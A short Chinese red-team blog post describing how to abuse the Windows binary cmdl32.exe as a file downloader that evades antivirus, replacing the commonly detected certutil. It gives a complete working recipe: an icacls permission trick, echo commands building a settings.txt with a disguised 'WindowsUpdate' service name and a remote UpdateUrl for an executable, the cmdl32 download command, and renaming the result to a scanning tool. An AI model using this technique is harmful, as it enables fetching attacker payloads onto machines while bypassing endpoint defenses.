cmdl32代替certutil从而绕过杀软

Redteam Bypass cmdl32
Tips
Publish Date:   2021-11-05
Update Date:   2021-11-05
Word Count:   297
Read Times:   1 Min
Read Count:  

简介

cmdl32.exe,CMAK(连接管理器管理工具包)使用它来设置连接管理器服务配置文件。配置文件通常打包成一个.exe,可以部署到用户系统,该软件包安装可用于启动拨号/VPN连接的配置文件

此处可以使用他来做一个下载器进行远程文件下载

image-20211105112812217

实际使用

常规的certutil已被杀软所监测,查杀情况如下

image-20211105113043797

此处利用cmdl32进行杀软绕过,从而远程下载文件

settings.txt配置文件

[Connection Manager]
CMSFile=settings.txt
ServiceName=WindowsUpdate
TunnelFile=settings.txt
[Settings]
UpdateUrl=http://192.168.122.1:8888/1.exe

命令行使用如下,本地生成相关配置文件
icacls %cd% /deny %username%:(OI)(CI)(DE,DC)
set tmp=%cd%
echo [Connection Manager] > settings.txt
echo CMSFile=settings.txt >> settings.txt
echo ServiceName=WindowsUpdate >> settings.txt
echo TunnelFile=settings.txt  >> settings.txt
echo [Settings]  >> settings.txt
echo UpdateUrl=http://192.168.122.1:8888/1.exe  >> settings.txt

image-20211105113350856

直接进行下载,defender无反应
cmdl32 /vpn /lan %cd%\settings.txt

image-20211105113538408

还原后,再通过move重命名即可

icacls %cd% /remove:d %username%
move VPND6A8.tmp fscan64.exe

image-20211105113819900

image-20211105113902214

Author: Yangsir
Link: https://yangsirrr.github.io/2021/11/05/cmdl32-dai-ti-certutil-cong-er-rao-guo-sha-ruan/
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !
Redteam Bypass cmdl32
  TOC